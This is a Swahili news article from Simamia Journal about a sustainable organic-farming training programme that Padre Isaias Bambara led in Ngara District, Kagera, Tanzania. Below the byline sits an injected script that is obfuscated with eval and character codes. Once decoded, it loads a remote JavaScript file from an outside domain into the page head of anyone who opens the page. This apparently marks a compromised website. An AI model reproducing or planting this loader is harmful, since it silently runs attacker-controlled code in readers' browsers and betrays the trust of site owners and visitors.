Recent Comments

KILIMO HAI ENDELEVU NI MKOMBOZI WA WANANCHI

By Simamia Journal May 4, 2021
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Wananchi Wilayani Ngara Mkoani Kagera wametakiwa kuzingatia Kanuni za Kilimo hai endelevu ili kupata mazao bora,kuboresha ardhi na kupata na Chakula cha asili kinachowezesha utunzaji na uimarishaji wa afya

Rai hiyo imetolewa na Padre.Isaias Bambara ambaye ni mwenyekiti wa Shirika la Marafiki wa Afrika Tanzania-MAT wakati wa mafunzo maalum katika utamburisho Programu ya Kilimo Hai Endelevu Wilaya ya Ngara MKHEN Mkoani Kagera

Walengwa wa mafunzo hayo walikuwa Viongozi wa vijiji,Mwenyekiti wa Kitongoji na Wakulima 24 kutoka kijiji cha Shamba darasa vijiji vya Kasulo,Mshikamano,Mugoma,Bugarama na Rulenge

Kupitia mafunzo hayo Wakulima wameelza kunufaika na Programu hiyo iliyobuniwa na Shirika la Marafikiwa Afrika Tanzania MAT, kwakufahamu Zaidi kuhusu

-Maana ya Kilimo

-Maana ya Kilimo hai

-Maana ya Kilimo hai endelevu

-Tofauti kati ya mfumo wa Kilimo hai endelevu na aina zingine za Kilimo hapa Nchini

Padre Bambara lizielezea Kanuni za Kilimo hai zinazofafanua yote hayo:-

  1. KILIMO:- Alieleza kuwa Kilimo ni shughuli ya kuzamisha aina Fulani ya mbegu ili ife ardhini juu au chini ya udongo ili ilete au izae kitu kipya kama zao la ile mbegu iliyooza na kutoa zao lingine jipya. Sayansi hii ambayo ndiyo “kilimo” tangu enzi za mababu na mababu Sayansi imetumika kama mfumo wa kuzalisha mazao yatumike kwa matumizi ya Viumbe hai kama Chakula,kinywaji na kipato cha kupata raslimali fedha kuzungusha na kujipatia kitu kingine tofauti na zao lenyewe au nyongeza ya zao lile lile.

 

Kila Nchi Duniani ina mfumo au Sayansi yake ya Kilimo kwakuzingatia mazingira ya ardhi au hali ya hewa.

 

Kilimo Nchini Tanzania nako iko hivyo kutegemeana na ardhi na hali ya hewa na mazingira ya Wilaya,Kijiji,Kitongoji nk.

  1. KILIMO HAI:- Kilimo Hai (Organic Farming) Ni moja ya mbinu za kilimo bora kinachozingatia matumizi stahiki na endelevu katika rasilimali za uzalishaji wa mazao ya kilimo na mifugo. Uhai ni Maisha na Maisha ni Uhai, ili kuwa na uhai tunahitaji Chakula na chakula bora ni Chakula kinachotokana na Kilimo hai.

Kilimo ni Kilimo bora Zaidi.

Wakulima wengine hutafuta maeneo mengine yaliyo bora baada ya kuona ardhi wanayotumia imechoka. Wakati mwingine hulazimika kuvamia misitu na kufyeka ili kupata mashamba mapya hali ambayo siyo tu kuharibu mazingira lakini pia inaweza kutuletea Umasikini wa milele kwasababu ardhi iliyoacha awali huwa haitafutiwi njia muafaka ya kuifanya irejee kwenye Ubora wake.

Wakulima wengine hutafuta mbolea hasa za Chumvi chumvi na kuzitumia katika ardhi ile inayoonekana kuzeeka. Lakini matatizo mengine huibuka kutokana na matumizi ya mbolea pamoja na madawa ya kemikali kwenye Kilimo. Mbolea hizo zina kemikali na madawa ya kuua wadudu yana madhara yake kwani yana sumu isiyoonekana. Sumu hizo tunakula au tunakunywa na ndizo zinazoletea madhara kwa binadamu na udongo n ahata wanyama

EBU TUVUTE KUMBUKUMBU ZETU:-

  • Angalia Umri wako ulioishi na angalia yafuatayo;-

Hali ya Udongo enzi zile(Hasa Miaka 45 na kuendelea) na sasa ikoje?

  • Kiwango cha maradhi wakati ule na sasa kikoje?
  • Uwezo wa udongo kuzalisha mazao umepungua au unazidi mwaka hadi mwaka?

Kwa vyovyote vile,tunahitaji kufanya kilimo kinachotuhakikishia maisha na Uhai

wetu wa kesho na Vizazi vyetu,Kilimo hiki ni kilimo hai na chenye tija pana,Soko pana na Kipato kipana Duniani. Wilaya ya Ngara ina fursa nyingi na pana kufaidi Kilimo Hai Endelevu.

 

Padre Isaias Bambara akifundisha Kilimo hai endelevu aliwaelekeza wakulima kuzingatia yafuatayo:-

 

KANUNI ZA KILIMO HAI ZIKO 4:-

Ifahamike kuwa ZAO unalotaka kulima lina muongozo wake. Miongozo hii kwa mazao tunayotaka kulima –Kahawa,Migomba,Parachichi na Nanasi mutapata miongozo yake kutoka kwa watalaamu katika kipindi hiki cha mafunzo. “Mimi natoa kanuni za KANUNI ZA KILIMO HAI 4”:- alisema

 

  1. Kanuni ya kwanza ni AFYA

Kanuni hii inaonesha kwanza Afya ya watu au jamii huwezi kutenganisha na Mfumo wa Kimazingira. Ardhi yenye rutuba huzalisha mazao bora kwa afya ya Binadamu na Wanyama.

 

Kilimo Hai Endelevu sharti kiwe endelevu kwakuzingatia urutubishaji udongo na kuboresha afya ya mimea,wanyama na Binadamu katika Sayansi ya Dunia bila Utengano wa aina yoyote. Afya ni mfumo wa uhai na utaratibu wa Maisha kwa ujumla unaozingatia siyo tu kutokuwepo kwa magonjwa bali kujali kutunza mwili,akili,ustawi na mazingira bora na mazuri ya kuishi.

 

Uwezo wa ujikinga,Kushiriki na kuendeleza uumbaji pamoja na kujijali ni tabia za msingi na muhimu kwa afya bora.

 

  1. Kanuni ya pili ni MAZINGIRA

Kanuni hii inawezesha kilimo hai kuhuisha na kuhifadhi mazingira.Hali bora na ustawi hupatikana kutokana na mazingira ya uzalishaji yanayojali uhai wa viumbe wengine mfano; Uzalishaji wa mazao unapaswa kuzingatia na kujali urutubishaji wa udongo ,ufugaji wanyama unaozingatia mfumo wa kimazingira wa shamba,ufugaji wa samaki na viumbe hai wa Baharini au ziwani uzingatie mfumo wa mazingira ya sehemu za maji husika(Baharini,Ziwani na Mtoni). Kilimo Hai kinasimamia Uhai na Mfumo wa Mazingira

 

  1. Kanuni ya tatu ni HAKI NA USAWA

 

Kanuni hii inasisitiza kwamba wale wote wanaojihusisha na Kilimo hai ni lazima wazingatie mahusiano yenye usawa katika ngazi zote bila kubagua au kupendelea,iwe niwazalishaji,walaji,wasindikaji,wafanyakazi,wafanya biashara au wasambazaji ili kuhuisha na kuboresha mazingira na kuhifadhi maliasili na rasilimali. Kilimo hai lazima kilete uwiano na Urari wa kimazingira kwakubuni na kuhimiza mfumo wa uzalishaji unaoweka mazingira bora kwa makazi na kutunza rasilimali katika jitihada za kuendeleza kilimo.

Wazalishaji,Wasindikaji,Wauzaji au wanunuzi,walaji na watumiaji,wote wa bidhaa za kilimo hai wanapaswa kushiriki kikamilifu katika kukinga,kuzuia uharibifu wa mfumo mzima wa mazingira unaojumuisha madhari,viumbe,hewa na maji. Kilimo hai kinajenga mahusiano yanayojali usawa,heshima na usimamizi wa ulimwengu pamoja na kukuza mahusiano ya Viumbe hai ndiyo maana sasa kuna vita ulimwenguni  ya kupambana na mabadiriko ya Tabia Nchi.

 

  1. Kanuni ya nne ni UANGALIZI

Kanuni hii inasema kwamba tahadhari na uwajibikaji ni masuala muhimu katika kusimamia kuendeleza na kuchagua Teknolojia za Kilimo hai. Sayansi ni muhimu katika kuhakikisha kwamba kilicho hai ni mfumo sahihi kiafya,Kiusalama na kimazingira. Hata hivyo maarifa ya kisayansi pekee hayatoshi,bali uzoefu wa kiutendaji,hekima,busara na Ubunifu uliojengeka kwa miongo kadhaa husaidia katika kutatua matatizo ya aina mbali mbali kiuzalishaji na muendelezo. Kilimo hai lazima kizuie athari za wazi zinaoweza kuzuilika kwa kubuni na kutumia Teknolojia  sahihi. Pia kukataa Teknolojia zisizokuwa endelevu  ambazo athari zake hazijafahamika bayana maamuzi lazima yazingatie mahitaji ya wote.

 

Kilimo hai kinatoa tahadhari na uwajibikaji unaoweka kinga kwa afya na ustawi wa vizazi vya sasa na vijavyo pamoja na kujali mazingira endelevu.

 

Aidha, Pdre Bambara amewashukuru  walioshiriki kwenye kazi hiyo iliyofanywa na wataalamu shirika la MAT akiwemo David Bukozo Mtaalam wa kilimo, Bw. Hassan (Ofisi ya Kilimo Halmashauri ya Wilaya ya Ngara) chini ya Utaratibu wa Mwl. Mushabe Willy(Mratibu wa Miradi Shirika la Marafiki wa Afrika Tanzania MAT). Kwa pamoja waliudadavua mradi huo ukafika mbele ya Uongozi wa Shirika la MAT na Halmashauri ya wilaya ya Ngara ukapata Baraka za kuutafutia ufhadhili.

Amesema, mradi ulipelekwa kwa wahisani wa shirika la MAT ambao ni marafiki wa Afrika Ujerumani (MAG)  na Fare World Rasttat (FWR) kwaajili ya kupata fedha za kutekeleza kwa manufaa ya wakulima wa wilaya hya Ngara ili wanufaike kimaisha na kiuchumi sambamba na kuokoa mazingira  yote yanayozunguka mradi huu. Kilichopeleka kukubalika ni kwasababu ni mradi wa Kilimo hai Endelevu- Rafiki wa Mazingira. Kutokana na hayo,Padre Bambara amewaomba washiriki wa mafunzo hayo kushukuru shirika la Erbacher Foundation la Ujerumani kuungana na mashirika ya MAG na FWR kuwezesha upatikanaji wa fedha za kutekeleza mradi wa huu wa aina yake. Wakulima wa wilaya ya Ngara na Mkoa wa Kagera ni bahati ya pekee. Alisema wakiuboresha utawapa fursa nyingine baadaye.

 

Pia alieleza matumaini yake kuwa Ushirikiano uliopo kati ya Halmashauri ya wilaya ya Ngara na Shirika la Marafiki wa Afrika Tanzania utadumishwa ili mafanikio ya utekelezaji wa pamoja wa mradi huo uwaongezee tija Zaidi kwa ustawi wa maisha ya jamii ya Ngara,Taifa na Dunia kwa ujumla ili kuweza “Kukenua ABAKENE”-MKHEN!.

Alimaliza mafunzo hayo kwakusema kuwa huo ndiyo mchango wa Shirika la MAT katika harakati za kuokoa Ulimwengu,Walimwengu na Viumbe hai kwakuanzisha Kilimo Hai Endelevu Wilayani Ngara, Mkoani Kagera, Tanzania kama sehemu ya Ulimwengu.

 

 

 

 

 

By Simamia Journal

Tangaza nasi. www.simamia.com YouTube Chanel: www.youtube.com/c/SimamiaTv